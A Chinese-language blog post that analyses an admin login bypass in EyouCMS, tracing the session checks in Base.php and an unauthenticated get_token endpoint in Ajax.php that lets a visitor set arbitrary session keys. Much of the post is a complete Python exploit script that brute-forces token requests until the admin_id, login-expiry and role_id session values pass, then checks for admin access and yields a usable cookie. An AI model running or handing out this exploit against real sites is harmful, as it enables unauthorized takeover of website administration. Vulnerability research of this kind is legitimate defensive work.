EYouCMS 后台登录绕过

后台登录判断

  • application/admin/controller/Base.php
  • 跟进_initialize方法,定位到第57行
           $admin_login_expire = session('admin_login_expire'); // 登录有效期web_login_expiretime
            if (session('?admin_id') && getTime() - intval($admin_login_expire) < $web_login_expiretime) {
                session('admin_login_expire', getTime()); // 登录有效期
                $this->check_priv();//检查管理员菜单操作权限
            }else{
                /*自动退出*/
                adminLog('访问后台');
			  // 进入后台
            }
  • 这里获取session,有两个要求session('?admin_id')这里要求admin_id有值即可,YouDianCMS里面是一样的。然后getTime() - intval($admin_login_expire)这里需要获取当前时间戳-获取admin_login_expire<3600.因此这里获取的session是一个很大的数字。
  • 再向下走跟进check_priv方法,当前文件第98行。
        if (0 >= intval(session('admin_info.role_id'))) {
            //超级管理员无需验证
            return true;
  • 发现这里只需要获取的session小于等于0即可。
  • 总结需要满足以下条件。
  • admin_id 有值
  • getTime() - intval($admin_login_expire)<3600
  • intval(admin_info.role_id)=<0

任意session设置

  • application/api/controller/Ajax.php
    public function get_token($name = '__token__')
    {
        if (IS_AJAX) {
            echo $this->request->token($name);
            exit;
        } else {
            abort(404);
        }
    }
  • 发现这里没做鉴权,我们能直接访问,同时参数可控,继续跟进token方法。
    public function token($name = '__token__', $type = 'md5')
    {
        $type  = is_callable($type) ? $type : 'md5';
        $token = call_user_func($type, $_SERVER['REQUEST_TIME_FLOAT']);
        if ($this->isAjax()) {
            header($name . ': ' . $token);
        }
        Session::set($name, $token);
        return $token;
    }
  • 发现这里的session设置的键名,我么能够控制,值为MD5加密的时间戳。
  • 上面获取的session有两个都转换成了整数,因为MD5加密的原因,我们因此可能遇见的字符开头为数字字符都有可能,因此需要一直请求,直到满足我们的条件为止。

GetToken

Script

  • 因为时间戳MD5加密的原因,导致可能要等很久才能找到我们需要的session。
from time import time,sleep
import requests
import sys

class EyouCMS:
    def __init__(self,URL):
        self.Req = requests.session()
        self.URL = URL
        self.SleepTime = 0.5
        self.AdminURL = 'login.php?m=admin&c=Admin&a=admin_edit&id=1&lang=cn'
        self.Payload = 'index.php/?m=api&c=ajax&a=get_token&name='
        self.admin_id = 'admin_id'
        self.admin_login_expire = 'admin_login_expire'
        self.admin_info_role_id = 'admin_info.role_id'
        self.Headers = {
            'x-requested-with': 'XMLHttpRequest',
        }

    def Banner(self):
        print("-"*10 + "后台登录绕过" + "-"*10)


    def change(self,string):
        temp = ''
        for n, s in enumerate(string):
            if n == 0:
                if s.isalpha():
                    return '0'
                    break
            if s.isdigit():
                temp += str(s)
            else:
                if s.isalpha():
                    break
        return temp

    def SetID(self):
        res = self.Req.get(self.URL + self.Payload + self.admin_id, headers=self.Headers)
        print("admin_id[+]:\t\t\t\t\t" + res.text)
        if 'Set-cookie' in res.headers:
            print(res.headers['set-cookie'])
        if res.status_code != 200:
            sys.exit("Api模块请求404")
        # print(res.headers)

    def SetExpire(self):
        while True:
            res = self.Req.get(self.URL + self.Payload + self.admin_login_expire, headers=self.Headers)
           # print(res.text,end='\t\t\t\t')
           # print(self.change(res.text))
            if(time()-int(self.change(res.text),10)<3600):
                print("admin_login_expire[+]:\t\t\t" + res.text)
                # print(res.headers)
                break
            sleep(self.SleepTime)

    def SetRoleID(self):
        while True:
            res = self.Req.get(self.URL + self.Payload + self.admin_info_role_id, headers=self.Headers)
            if(int(self.change(res.text),10)<=0):
                print("admin_info.rele_id[+]:\t\t\t" + res.text)
                break
            sleep(self.SleepTime)

    def CheckLogin(self):
        res = self.Req.get(self.URL + self.AdminURL, headers=self.Headers)
        res.encoding = res.apparent_encoding
        if '更换头像' in res.text:
            print("OK")

    def run(self):
        self.SetID()
        self.SetExpire()
        self.SetRoleID()
        self.CheckLogin()

if __name__ == '__main__':
    Start = time()
    URL = 'http://127.0.0.1/eyoucms/'
    e = EyouCMS(URL)
    e.run()
    End = time()
    print(End-Start)
  • 最后跑出来cookie,替换后即可成功登录后台。

Cookie

posted @ 2021-06-13 14:13  Pan3a  阅读(3272)  评论(1编辑  收藏  举报